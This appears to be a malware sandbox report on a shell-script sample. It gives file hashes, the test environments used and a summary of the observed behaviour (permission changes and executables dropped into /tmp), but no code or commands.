Analysis
-
max time kernel
6s -
max time network
128s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240729-en -
resource tags
arch:amd64 arch:i386 image:ubuntu1804-amd64-20240729-en kernel:4.15.0-213-generic locale:en-us os:ubuntu-18.04-amd64 system -
submitted
21/11/2024, 08:26
Static task
static1
Behavioral task
behavioral1
Sample
c9003c97407a9fa6047dc81cb2f622cc8dad75c7bb742523f2197a627c5b7459.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
c9003c97407a9fa6047dc81cb2f622cc8dad75c7bb742523f2197a627c5b7459.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
c9003c97407a9fa6047dc81cb2f622cc8dad75c7bb742523f2197a627c5b7459.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
c9003c97407a9fa6047dc81cb2f622cc8dad75c7bb742523f2197a627c5b7459.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
c9003c97407a9fa6047dc81cb2f622cc8dad75c7bb742523f2197a627c5b7459.sh
-
Size
10KB
-
MD5
761e2fa6cb02a9f2286c4b3ab9c366b1
-
SHA1
7863ee6c6bde7cdd84e2ced24347237ff83ae4bf
-
SHA256
c9003c97407a9fa6047dc81cb2f622cc8dad75c7bb742523f2197a627c5b7459
-
SHA512
e89613581513d8fb590f845aaec4a5981010983317877dabfadeb2aaee5f12cb31beabd47fb65f091f8d5dd1f4fd5168ff11f7bd43badf191419f0c7bf77a24a
-
SSDEEP
192:m5ZKXmXaXtGW47WK3BJ377AwjSeZ78Eoz3jOCI7DHSWOwOgOy5NK7dFIeYAw2EMn:antZiRQe/eY5
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
-
MD5
998368d7c95ea4293237f2320546e440
-
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
-
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
-
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97